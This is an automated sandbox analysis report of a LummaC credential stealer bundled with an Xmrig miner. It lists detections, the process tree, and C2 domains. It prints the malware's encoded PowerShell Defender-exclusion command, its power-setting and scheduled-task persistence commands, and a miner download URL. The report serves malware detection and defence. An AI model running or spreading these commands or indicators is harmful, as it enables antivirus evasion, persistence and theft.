Edit tour

Windows Analysis Report
setupx 1.exe1.exe

Overview

General Information

Sample name:	setupx 1.exe1.exe
Analysis ID:	1637273
MD5:	d3dfeb11e332ea228567f9f4ebafef51
SHA1:	86ab8368a72f9490c175de5032c2b9f2a219f0ee
SHA256:	79188b44c38f4fabdb8868d0fad3ba1b297b627e8a7d2438fcf7edbaf4c2a6c8
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected LummaC Stealer

Yara detected Xmrig cryptocurrency miner

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to inject code into remote processes

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Modifies power options to not sleep / hibernate

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

setupx 1.exe1.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\setupx 1.exe1.exe" MD5: D3DFEB11E332EA228567F9F4EBAFEF51)

conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

setupx 1.exe1.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\setupx 1.exe1.exe" MD5: D3DFEB11E332EA228567F9F4EBAFEF51)

ZHKYZWVTC38PGAWGZF49K.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)

cmd.exe (PID: 516 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6044 cmdline: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 5128 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powercfg.exe (PID: 7188 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7204 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7220 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7236 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7252 cmdline: powercfg /hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

cmd.exe (PID: 7408 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7520 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7416 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7512 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

WerFault.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://harfanglab.io/insidethelab/unpacking-packxor/ https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f4134320f76ad00884e54d36efdebfe68c886445f3e82d0949"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1082401555.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: setupx 1.exe1.exe PID: 6848	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: setupx 1.exe1.exe PID: 6848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: setupx 1.exe1.exe PID: 6848	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ZHKYZWVTC38PGAWGZF49K.exe PID: 7100	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.setupx 1.exe1.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.setupx 1.exe1.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.ZHKYZWVTC38PGAWGZF49K.exe.3078c0d.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ProcessId: 7100, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe", ParentImage: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ParentProcessId: 7100, ParentProcessName: ZHKYZWVTC38PGAWGZF49K.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 516, ProcessName: cmd.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , ProcessId: 6044, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , ProcessId: 6044, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe", ParentImage: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ParentProcessId: 7100, ParentProcessName: ZHKYZWVTC38PGAWGZF49K.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7408, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:33:37.859535+0100	2028371	3	Unknown Traffic	192.168.2.8	49682	188.114.97.3	443	TCP
2025-03-13T13:33:40.505685+0100	2028371	3	Unknown Traffic	192.168.2.8	49684	188.114.97.3	443	TCP
2025-03-13T13:33:42.699100+0100	2028371	3	Unknown Traffic	192.168.2.8	49688	188.114.97.3	443	TCP
2025-03-13T13:33:45.501672+0100	2028371	3	Unknown Traffic	192.168.2.8	49690	188.114.97.3	443	TCP
2025-03-13T13:33:48.410028+0100	2028371	3	Unknown Traffic	192.168.2.8	49691	188.114.97.3	443	TCP
2025-03-13T13:33:50.933221+0100	2028371	3	Unknown Traffic	192.168.2.8	49692	188.114.97.3	443	TCP
2025-03-13T13:33:55.415611+0100	2028371	3	Unknown Traffic	192.168.2.8	49694	188.114.97.3	443	TCP

ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:34:03.475012+0100	2829056	2	Crypto Currency Mining Activity Detected	192.168.2.8	49701	185.215.113.51	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: setupx 1.exe1.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f4134320f76ad00884e54d36efdebfe68c886445f3e82d0949"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: setupx 1.exe1.exe	Virustotal: Detection: 65%			Perma Link
Source: setupx 1.exe1.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,

2_2_0041BAC1

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 10.2.ZHKYZWVTC38PGAWGZF49K.exe.3078c0d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZHKYZWVTC38PGAWGZF49K.exe PID: 7100, type: MEMORYSTR

Source: setupx 1.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2

Source: setupx 1.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CFFCDE FindFirstFileExW,	0_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00CFFD8F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CFFCDE FindFirstFileExW,	2_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00CFFD8F

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]	2_2_00442800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh]	2_2_0040D830
